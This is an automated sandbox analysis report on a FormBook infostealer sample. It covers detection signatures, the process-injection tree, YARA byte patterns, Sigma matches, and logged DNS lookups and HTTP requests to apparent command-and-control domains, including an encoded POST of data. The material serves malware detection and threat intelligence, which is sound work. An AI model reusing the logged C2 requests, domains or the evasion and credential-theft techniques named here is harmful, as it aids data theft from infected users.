Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sa7Bw41TUq.exe

Overview

General Information

Sample name:sa7Bw41TUq.exe
renamed because original name is a hash value
Original sample name:207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727.exe
Analysis ID:1529872
MD5:6cd77b30f320ed9e0e515073e1175898
SHA1:c60f550fefe35a235e0ddddf876626cf0bdd77eb
SHA256:207680e811fa11e2aceed223a1ac803751e70ef42f951fad9a068530b0044727
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • sa7Bw41TUq.exe (PID: 4456 cmdline: "C:\Users\user\Desktop\sa7Bw41TUq.exe" MD5: 6CD77B30F320ED9E0E515073E1175898)
    • svchost.exe (PID: 7200 cmdline: "C:\Users\user\Desktop\sa7Bw41TUq.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • uxEGEjhWYrJv.exe (PID: 1768 cmdline: "C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • typeperf.exe (PID: 7472 cmdline: "C:\Windows\SysWOW64\typeperf.exe" MD5: 93925D4F55465CFC73C4CDF7F8B1F375)
          • uxEGEjhWYrJv.exe (PID: 1104 cmdline: "C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1410f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1410f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f463:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x175e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e663:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x167e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ParentImage: C:\Users\user\Desktop\sa7Bw41TUq.exe, ParentProcessId: 4456, ParentProcessName: sa7Bw41TUq.exe, ProcessCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ProcessId: 7200, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ParentImage: C:\Users\user\Desktop\sa7Bw41TUq.exe, ParentProcessId: 4456, ParentProcessName: sa7Bw41TUq.exe, ProcessCommandLine: "C:\Users\user\Desktop\sa7Bw41TUq.exe", ProcessId: 7200, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: sa7Bw41TUq.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: sa7Bw41TUq.exeReversingLabs: Detection: 60%
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: sa7Bw41TUq.exeJoe Sandbox ML: detected
            Source: sa7Bw41TUq.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558723774.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737429493.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005CC4D0 FindFirstFileW,FindNextFileW,FindClose,12_2_005CC4D0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then xor eax, eax12_2_005B9A50
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then mov ebx, 00000004h12_2_02E504DE
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 4x nop then xor eax, eax14_2_04DD4EF5

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.mecateg.xyz
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ptae/?ZZY=w3WU5oZhC+LnKx26kaNk+YWYu6qqBKD6PC4MUwZYu/Z6/i99bgGsvL6SKkltDKfqu2CGNTh4TErFYwL/tEu+bdChCdZ/afdxeSWGORoCU6iTOQ97Sy+G7WrM0B37ODseprTGeRopW7u8&mHm0o=rrqhoH HTTP/1.1Host: www.bluegirls.blogAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /e4x0/?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHuVtRNJYUfNJ81Qyljm2TCpzqhutEcPP6D5gqXcB7APUAChnFD6LC10hZW5DnCrv8nATu9qGN6LFx4zvr8w5xDip8OL+K5FPsX&mHm0o=rrqhoH HTTP/1.1Host: www.firstcry.shopAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0r21/?mHm0o=rrqhoH&ZZY=fpQWUmUD3QBv9qaBiDNDC55X+pZkXcZKAs7PtWtHybHyzx2AGLiILISraADyo1q+hqHiafFS+6J0wcG7bEgZBkPYVPFAzuLp86jiTbWXEL7WrvfJBC+mpaVtq3e+NG0F9h9/HweK9zd4 HTTP/1.1Host: www.cc101.proAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bp9c/?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH HTTP/1.1Host: www.myjiorooms.servicesAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sq12/?ZZY=z6EWwjUgJz2bJPVNnwixtdiBclz6U+1c8CkWN3ljQgjJGrzDNHqxSoLtP95ZDgz7MgUxfMzo2dU5U8jEaokJ+YFKTiu0SNRlbEWC0HQQ7kWDv/RczpK4Ywebc8IjilGLuKMcxKVh8K9W&mHm0o=rrqhoH HTTP/1.1Host: www.mecateg.xyzAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qt7h/?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O HTTP/1.1Host: www.dto20.shopAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jso9/?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk HTTP/1.1Host: www.hampelsmagic.lifeAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /s7qk/?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH HTTP/1.1Host: www.zingara.lifeAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /reui/?ZZY=86WVBsaKd0g/fiy38lBVTFNtYioQJ/XID2I2jzZkjXxxzqQXnIBLpzjUTcMxZ+VjRI6hFe2KzQRCqdeRoprBsBuO38R4j7pNa7/TdtnWnso/3MHserSUB0MZw7CHuHvixsEQagEWFuT7&mHm0o=rrqhoH HTTP/1.1Host: www.polarmuseum.infoAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fvi9/?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH HTTP/1.1Host: www.consultarfacil.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0cbg/?ZZY=ReVCyzq7e32zPSksEOCt3pbKcx4rKGTIyRipE0uGIQ28zkTth8noQJXIJc3ts0ISqVogbi/TYpoiqGzNpNOIXMLKx0kCr+Xw6Q+8qepVva7bCGUCYF3oCYt7aX6G3loK+iyEYGVwNCt0&mHm0o=rrqhoH HTTP/1.1Host: www.40wxd.topAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /eysm/?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH HTTP/1.1Host: www.allthingsjasmin.comAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.bluegirls.blog
            Source: global trafficDNS traffic detected: DNS query: www.firstcry.shop
            Source: global trafficDNS traffic detected: DNS query: www.cc101.pro
            Source: global trafficDNS traffic detected: DNS query: www.myjiorooms.services
            Source: global trafficDNS traffic detected: DNS query: www.mecateg.xyz
            Source: global trafficDNS traffic detected: DNS query: www.monos.media
            Source: global trafficDNS traffic detected: DNS query: www.dto20.shop
            Source: global trafficDNS traffic detected: DNS query: www.i16zb920d.cfd
            Source: global trafficDNS traffic detected: DNS query: www.hampelsmagic.life
            Source: global trafficDNS traffic detected: DNS query: www.zingara.life
            Source: global trafficDNS traffic detected: DNS query: www.polarmuseum.info
            Source: global trafficDNS traffic detected: DNS query: www.trafegomagico.shop
            Source: global trafficDNS traffic detected: DNS query: www.consultarfacil.online
            Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.allthingsjasmin.com
            Source: global trafficDNS traffic detected: DNS query: www.ophthalmo.cloud
            Source: unknownHTTP traffic detected: POST /e4x0/ HTTP/1.1Host: www.firstcry.shopAccept: */*Accept-Language: en-US,enAccept-Encoding: gzip, deflateOrigin: http://www.firstcry.shopContent-Length: 216Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheReferer: http://www.firstcry.shop/e4x0/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4e 56 78 37 38 53 49 73 4e 37 4c 37 57 33 75 6c 54 58 48 2b 35 64 35 2f 73 7a 6e 65 62 5a 6a 47 49 4d 46 6e 49 35 6b 61 45 39 38 74 62 53 5a 4d 6f 6a 4c 33 6a 67 53 66 70 66 45 49 64 36 32 43 33 69 33 37 57 52 58 51 45 79 59 49 6a 57 4a 38 6e 49 76 78 69 51 46 4d 6a 54 71 43 2b 65 4a 67 53 47 4c 53 69 32 5a 77 4f 51 49 77 36 65 53 6f 37 34 64 61 37 66 70 65 50 73 71 43 47 66 34 58 30 4d 6f 47 51 6d 38 6e 57 32 75 58 56 75 6a 45 45 49 2f 50 75 48 33 77 69 78 64 6d 79 37 6c 56 68 67 76 48 6c 38 68 55 32 33 5a 32 50 34 70 36 41 6a 6d 74 45 67 38 53 72 41 39 4c 38 73 63 70 76 79 47 4c 32 51 3d 3d Data Ascii: ZZY=GP7WoEL4LIDXNVx78SIsN7L7W3ulTXH+5d5/sznebZjGIMFnI5kaE98tbSZMojL3jgSfpfEId62C3i37WRXQEyYIjWJ8nIvxiQFMjTqC+eJgSGLSi2ZwOQIw6eSo74da7fpePsqCGf4X0MoGQm8nW2uXVujEEI/PuH3wixdmy7lVhgvHl8hU23Z2P4p6AjmtEg8SrA9L8scpvyGL2Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:05:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 74 61 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ptae/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:06:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
